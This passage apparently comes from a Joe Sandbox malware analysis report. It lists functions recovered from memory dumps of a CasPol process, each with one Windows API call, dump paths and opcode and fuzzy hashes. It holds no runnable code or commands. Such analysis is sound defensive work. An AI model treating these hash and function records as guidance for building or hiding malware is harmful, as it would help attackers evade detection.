Instruction Fuzzy Hash: 5801B172600200AFD310DF16DD45B36FBA8FB88A20F14851AED489B741E731F515CBE2

Function 23D62962 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,00000EA8,?,?), ref: 23D629B2

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 9c8fbcd2c088d7c1022ccc3cc903e7a52d23477ee2acb6bf0c46c5253d2ab73d
Instruction ID: 90b97341ac860e3445a1d06f40ac919c0dae64b834c9297e42fd46efe49ce7e8
Opcode Fuzzy Hash: 9c8fbcd2c088d7c1022ccc3cc903e7a52d23477ee2acb6bf0c46c5253d2ab73d
Instruction Fuzzy Hash: 5E01B172600200AFD310DF16DD45B36FBA8EB88A20F14851AED489B741E731F515CBE2

Function 23D60032 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6006C

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 8c2ab70e003394eb377d8255883967f7ef5a46c917f494c7139462d8e0d19cd3
Instruction ID: 8762300cc960c408970726d7743d1e5228c8a898f55e3321586f1dd4d574f306
Opcode Fuzzy Hash: 8c2ab70e003394eb377d8255883967f7ef5a46c917f494c7139462d8e0d19cd3
Instruction Fuzzy Hash: 97019E75A046049FDB10DF26E985B66BB98EF40620F48C4AADD88CB342D675E454CF62

Function 2180A5EE Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2180A632

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f2108c4b3bd0ed64d1caf19503d1ea979b984cee320f5791cd32e433bc41b54a
Instruction ID: 84322472138053ccf4fe3b736b7ea4a580b60c1fcb40be46a5d47aa057e53c52
Opcode Fuzzy Hash: f2108c4b3bd0ed64d1caf19503d1ea979b984cee320f5791cd32e433bc41b54a
Instruction Fuzzy Hash: 6B018B36400704DFDB218F51DD84B56FBE4EF48720F08C9AAED898A662C376E014DF62

Function 2180B7EE Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 2180B832

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e86da77db88f8a6baf4947c193317bdcaeb1b6986c6610fd859aa9eddcfbc921
Instruction ID: 0f0ddd3ad9d5b9a371cd65457277b94d0249e9773b7a793a8253c7579851e969
Opcode Fuzzy Hash: e86da77db88f8a6baf4947c193317bdcaeb1b6986c6610fd859aa9eddcfbc921
Instruction Fuzzy Hash: 0401A136400704DFDB318F51DC84B66FBA0EF08320F08C46AED854B662D375A154DF62

Function 2180A406 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

FindWindowW.USER32(?,?), ref: 2180A44B

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 576dfb04fd6c02ecf8e0dd681d260e0894f2a7c9cd37230d116584416bbb5fb4
Instruction ID: d35b89a610db18aeb3872c33203f00dbe3a0167fbfe701b5d7139615704e289b
Opcode Fuzzy Hash: 576dfb04fd6c02ecf8e0dd681d260e0894f2a7c9cd37230d116584416bbb5fb4
Instruction Fuzzy Hash: 7B017179600648DFEB10CF15DCC9B26FBD8EF05724F4880A9DD448B352D275E444CAA2

Function 2180B042 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000EA8,?,?), ref: 2180B092

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 35476bea6c22a62a8b887c28be633ab53fea3fe7b8b5c1c648a19fc6485dddf3
Instruction ID: 8087809cf8a38ea546e0d11180e0b896f2019bc056ca5836ca07d00854b63ea8
Opcode Fuzzy Hash: 35476bea6c22a62a8b887c28be633ab53fea3fe7b8b5c1c648a19fc6485dddf3
Instruction Fuzzy Hash: 8701A271600200ABD310DF16DC46B36FBA4FB88A20F148159ED485B741E775F515CBE6

Function 23D61922 Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000EA8,?,?), ref: 23D61972

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 332edc687dc896957c0540803cfb49a6d02cd3e39986aff4cc4693b4e9821458
Instruction ID: 841d4e3c7b7e17e8b4bb568e9d14afc004b44c18d707d0f393e436e91f5c9416
Opcode Fuzzy Hash: 332edc687dc896957c0540803cfb49a6d02cd3e39986aff4cc4693b4e9821458
Instruction Fuzzy Hash: 3401A272600200ABD310DF16DC46F36FBA4FB88A20F14811AED485B741E771F525CBE6

Function 2180BC26 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 2180BC61

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e9272551943dacdb96b8ad0806826bf8da2d9be3829f97783bfad28be7fd38ca
Instruction ID: bda0a9cd91f3ba641ff01f88032801f3911dbd294eabaaa1bdbbd4e396c16563
Opcode Fuzzy Hash: e9272551943dacdb96b8ad0806826bf8da2d9be3829f97783bfad28be7fd38ca
Instruction Fuzzy Hash: 3F017139500608DFDB218F15DC84B66FBA4EF05320F08C4AEED454B692D775E454DBA2

Function 2180A832 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 2180A864

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 87e86cacb81e995ad63d970a9f8cc809bac5409b71c23321fa32ef6001caab59
Instruction ID: 41c860aadec61f2ede95228048e19eebc1fb71f3640278d2588091f725599972
Opcode Fuzzy Hash: 87e86cacb81e995ad63d970a9f8cc809bac5409b71c23321fa32ef6001caab59
Instruction Fuzzy Hash: 7E01D135900248DFDB10CF15DD88B65FBA4EF05320F48C4AADD489F342D379A648CBA2

Function 2180B8AE Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 2180B8E9

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 94c64c2cae71e3a03007e136f631339ca4f108253511186ee402300715a7c59c
Instruction ID: 8d3427cc6cc4817a961b8e03baedff9139f1bb1ae60922f677a0964bf802c292
Opcode Fuzzy Hash: 94c64c2cae71e3a03007e136f631339ca4f108253511186ee402300715a7c59c
Instruction Fuzzy Hash: AF018F39500708DFDB318F06DC84B25FBA0EF15320F08C49ADD444B362E375A554DBA2

Function 2180A996 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 2180A9CE

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 0d71086a8ad3aa52baeb82fa0118d054293f689c1cfe6c58e49efd1d5d015282
Instruction ID: 5d0bbaf5d3a4c3f3574d50069ff05238828354f9e7ed931096d09901b828cf8a
Opcode Fuzzy Hash: 0d71086a8ad3aa52baeb82fa0118d054293f689c1cfe6c58e49efd1d5d015282
Instruction Fuzzy Hash: 7C01D139600648DFDB208F05DC84B16FBA0EF05320F08C1AADD894B752C3B5A488DFA2

Function 2180BEE6 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 2180BF18

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
Instruction ID: 7c59ffde3c94f163dea48f0d9b6c0db5fe3e45c3294df3ec906be8d8b0bff1f4
Opcode Fuzzy Hash: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
Instruction Fuzzy Hash: 53F0AF39500248DFDB208F05DC89B65FBA4EF05725F48C4AAED494B352E37AA944CEA2

Function 2180A372 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 2180A3A4

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
Instruction ID: 05038fdaaf5433c7e8f2ed7aa42100c669b21f5ba02607e606b1a2be838204d6
Opcode Fuzzy Hash: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
Instruction Fuzzy Hash: 5CF08C39500248DFDB208F15DD88B66FBA4EF05325F48C0AADD484B752D2B9A544CBA2

Function 23BD20D0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

r*+, xrefs: 23BD230F

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 30f249962b3befd9d75dd49169e2a3d0a79af953cb0d2e0151dbe5093c3f2774
Instruction ID: 2d5e9bb55f4ef814354a4cdc7ebbe4d1f662f0d1b7b1cad10d35820115cee10e
Opcode Fuzzy Hash: 30f249962b3befd9d75dd49169e2a3d0a79af953cb0d2e0151dbe5093c3f2774
Instruction Fuzzy Hash: 35715932E1828DCFCB04DFA4C485AAEBBB1EF85314F1080BAD5119F2A4D7349A41CF52

Function 23BD02E8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

:@~g, xrefs: 23BD0537

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID: :@~g
API String ID: 0-2887969434
Opcode ID: 690891deb17bbc41487bf0e0bb476582293c8508f7975f3be13ddf0bc938a197
Instruction ID: 154973ac6ebaceef93ccf090af1a34d4f0d1320d1ba3eb91a6baaa24739ed650
Opcode Fuzzy Hash: 690891deb17bbc41487bf0e0bb476582293c8508f7975f3be13ddf0bc938a197
Instruction Fuzzy Hash: 85516E76A04209CFDB04DF24C4A4A6D77F2FF8D314F1480A9D5469B764DB749D41CB82

Function 23BD2D58 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

, xrefs: 23BD2E76

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 030f51f866c35e13d64e48a275aed68f1ab6c689f03cb597e1cf53d5dd8c0239
Instruction ID: 061d62beacee16555155fe0233b6b612320c5a58a2e44de798100ce0ca4e6c72
Opcode Fuzzy Hash: 030f51f866c35e13d64e48a275aed68f1ab6c689f03cb597e1cf53d5dd8c0239
Instruction Fuzzy Hash: D641D132F2419DCBDB10DF68C88099EB7A2EBC9219F28C5B6C415DF615D735E8428B82

Function 23BD12A0 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d8978d78b0d3897ba56e48701af360bc84f08a3db5d556022f8ba2fabee8c7
Instruction ID: 6df58de694209ace9c80872d6fc53b95c7c9417fb793c7f83a3b8d8974c563d4
Opcode Fuzzy Hash: 68d8978d78b0d3897ba56e48701af360bc84f08a3db5d556022f8ba2fabee8c7
Instruction Fuzzy Hash: A222F138A04649CFC764DF24C484A6AB7F2FF48304F1489AAD85A9B765DB34ED86CF41

Function 23BD5E50 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fb49add0f226f863e12d23640914b2f76ea30950ca900cbed4f36be5dde249
Instruction ID: 8539b0bbdca97f19d794b0b5d980c519e4cba83b8d1bb2e2bb60846aca5139c1
Opcode Fuzzy Hash: 25fb49add0f226f863e12d23640914b2f76ea30950ca900cbed4f36be5dde249
Instruction Fuzzy Hash: A9815F32A00619CFCB15DF24C890A9AB7B2EF49304F45C5E5D909AF216DB71EE86CF81

Function 23BDA7BF Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c6492815a3a0c02b60f209ff75d677f77733dd6e1f2dce4a4e87bccf19b869
Instruction ID: 49a5e09e3c57744ab4409853c90887a79b5f4e5cabf1021cf46e961ce85e152a
Opcode Fuzzy Hash: 35c6492815a3a0c02b60f209ff75d677f77733dd6e1f2dce4a4e87bccf19b869
Instruction Fuzzy Hash: 3A81F23560051ACFD708DB68C894A7EB7A3FFC9308F91856DE1169B698CFB0AC05C796

Function 23BD51F2 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53da336591eca1468682352eb41f7fc5d34c5873e93a44323c522644968fdb92
Instruction ID: 6de9be9f45f928fc21f5588696f67280aec2a8d38a8efc38039187a578c54e37
Opcode Fuzzy Hash: 53da336591eca1468682352eb41f7fc5d34c5873e93a44323c522644968fdb92
Instruction Fuzzy Hash: 0A919E36A001499FDB05DFB4C444AAEBBF2EF99308F1444BAD506AB271DB70AD49CB52

Function 23BDE6C5 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d49153ceeaa17956bfd1ae0b0948f60820cbdbc73977f9d0d684dba00880cc2
Instruction ID: 547278775379f80967bc318e314e08057b39421cbdd42328b9d3f8c237c1d879
Opcode Fuzzy Hash: 3d49153ceeaa17956bfd1ae0b0948f60820cbdbc73977f9d0d684dba00880cc2
Instruction Fuzzy Hash: E781E43AA04149CFDB14DF68C480A6DB7F2EF84B14F1985FAE4499B262C735ED41C791

Function 23BDE3B0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e5137c4b94ba95c2769ff3492ebf0b3b59d658aabd19f7d288ac666f6954c1
Instruction ID: 3dc818d6de28267121c4956dd0c71bcacac33ec83d4a0f2df87cf7a4729ba157
Opcode Fuzzy Hash: f0e5137c4b94ba95c2769ff3492ebf0b3b59d658aabd19f7d288ac666f6954c1
Instruction Fuzzy Hash: BE510676A0428DCFDB04DFA4C4806AEBBB2EFC8714F5445FAC4069B256DB389946CF51

Function 23BD09A0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2c3f5b0a880d8f603575e1ee97981150f0e64c8d563e4adfe500cde1faf020
Instruction ID: 8f35204a102f676f363ae412527bcc3a0419770786e6177bbdebc19a03c887a6
Opcode Fuzzy Hash: 3f2c3f5b0a880d8f603575e1ee97981150f0e64c8d563e4adfe500cde1faf020
Instruction Fuzzy Hash: 9351C336B44259DFDB04DF68C894AAEB7F6EF88708F1184B9D5169B260CB709D06CB81

Function 23BD4D61 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664db91a64a05bfa0d523e7df0a62e35e0fca60faf8d242013be5d6aa6c03840
Instruction ID: 6b73a0eb84181cf0cefb1d455e4f7ac8df6f59b574816cb104ed77600505d903
Opcode Fuzzy Hash: 664db91a64a05bfa0d523e7df0a62e35e0fca60faf8d242013be5d6aa6c03840
Instruction Fuzzy Hash: 36519E367082898FC708DF64C5849BD77E2EF98204B5585B6E90A8F269DF34DC01CB96

Function 23BDDDF0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4667bd9ed1719bd8efa0919aa394561595c89d43f5565cf5d6458d3a279d8f
Instruction ID: 3c5754a623efd4774b50eac79124ea20a4d9899c1da412ca61247086de635b72
Opcode Fuzzy Hash: 6f4667bd9ed1719bd8efa0919aa394561595c89d43f5565cf5d6458d3a279d8f
Instruction Fuzzy Hash: 62514A32A0021DDFCF04DF94C8908ADB7B7EF99314F1484AAE906AF255DB30AD06CB95

Function 23BD73A8 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da02111bcec6cd341b3c80e96c8cb2cd3982e2141cc01f503f85b474b8a5027
Instruction ID: fc4421d1af25cf73a1406834268dbdd5b51ce94b1adc7692ba30076dcf5f6352
Opcode Fuzzy Hash: 8da02111bcec6cd341b3c80e96c8cb2cd3982e2141cc01f503f85b474b8a5027
Instruction Fuzzy Hash: B031F53290025ECFDF15CF14C855ACABBB2AF89304F5184A4D909BB255D7706B8ACF81

Function 23BD6F10 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7b5b846886345f1f29b5883ff79931c32b07b2c9f6ce0a84b3a9be649be34c
Instruction ID: 82743be71342304e400a7f4fa72529032fe678f3f6aa192c0a306bb5caf5badd
Opcode Fuzzy Hash: 8f7b5b846886345f1f29b5883ff79931c32b07b2c9f6ce0a84b3a9be649be34c
Instruction Fuzzy Hash: 9A517C76B002188FCB08DFB9C5545AEB7E7AF88314B648579C906AB794DB31EC42CB91

Function 23BD7890 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b34e1edf7e4b2b42e15d6483bab50c5f6b9f3ab30f704751db3eb86e37100d8
Instruction ID: 624d1cbf906c5c252f2d7a4c450a3332e04a6d53bd8e3126e06f6aeeec3f4dd7
Opcode Fuzzy Hash: 6b34e1edf7e4b2b42e15d6483bab50c5f6b9f3ab30f704751db3eb86e37100d8
Instruction Fuzzy Hash: A3512176D04258CFCB14DFA8C984ACDBBF1FF48310F2486AAD85AA7668E7316945CF41

Function 23BD0682 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62646a79b7c37e6fa2e4eb14729a93bdc952209e95a2bbf182e5ba5da64f2fbc
Instruction ID: 5ba8569cb57325ba27a7901e1c52a23f1df3bee9da20b262d12b6b8af6843a86
Opcode Fuzzy Hash: 62646a79b7c37e6fa2e4eb14729a93bdc952209e95a2bbf182e5ba5da64f2fbc
Instruction Fuzzy Hash: 37415A36680259CBD704AF34D89856D3BA2AF8430AB444479F507CA2A4CF788C428F86

Function 23BD7B61 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5e0c4dfe599312be3e6b11a2cadb3d8a5c8db6aa0aae71e3e8400c9bec3316
Instruction ID: b5df67791891b0be56235932919095ff757458986e890139a595f8b83bc7a211
Opcode Fuzzy Hash: 2e5e0c4dfe599312be3e6b11a2cadb3d8a5c8db6aa0aae71e3e8400c9bec3316
Instruction Fuzzy Hash: 81514A39A04219CFCB14EF74C598AACB7F2BF89205F5486F9E409DB665DB309C81CB61

Function 23BD6A18 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f724018ff556759db53a7836669a7bd04b1a0ac20ddce77f0df9cb89fd308b
Instruction ID: e2daca9bfbd4663369fbbd8aeb39edab9f1d4c3a89257d4def6bf10e7d1232a4
Opcode Fuzzy Hash: 90f724018ff556759db53a7836669a7bd04b1a0ac20ddce77f0df9cb89fd308b
Instruction Fuzzy Hash: E251CE3AB01388CF8B04EF79C49052D77A3FF9D31175445B9D8069BB59CB35A842CB96

Function 23BD0BC0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6942d9d2af7d593c09ac2c6a82ed188f3f7501d395b8cfb5dda362bb20636fb4
Instruction ID: 78057feddb3baba14eb94c1ff9a5622becfb672a6a8942e219e2ea3f24b1ec4a
Opcode Fuzzy Hash: 6942d9d2af7d593c09ac2c6a82ed188f3f7501d395b8cfb5dda362bb20636fb4
Instruction Fuzzy Hash: 2241D732B04118CFC705CF64C414A9E77E6AF8A315F1980BAE906EF365CF759C068792

Function 23BD8188 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd95e0f5263c0144187b1e61bae8d9b9b6958abd792a03be1c25eaa71a44d8b9
Instruction ID: 0680e776f7332c87027e8ae6ff660c1770068cd1a90e5d83ddeaa70cacdf3d9e
Opcode Fuzzy Hash: bd95e0f5263c0144187b1e61bae8d9b9b6958abd792a03be1c25eaa71a44d8b9
Instruction Fuzzy Hash: 8C419C36A0454ACFCF00DFA4D8849ADB7B1FF88716F2586B6E515CB255C730A84ACB91

Function 23BD5508 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a176b94bbeefce5b61cf81ac189d0cc3ef33a63e4ea23f208b9c5a281bd6302c
Instruction ID: 5fc292022a9759735b1a317d3806a0938aff17c8b98c08e6a7b6bfb540dcf458
Opcode Fuzzy Hash: a176b94bbeefce5b61cf81ac189d0cc3ef33a63e4ea23f208b9c5a281bd6302c
Instruction Fuzzy Hash: 7241C237B442488BDB05AF75881972E27AB9F84658F1848BF9906CB694EF78CC018B56

Function 23BD6A90 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f12bb64c450ca91e3b2ee211adc62b2409735fcb501207382ef85febb471fab
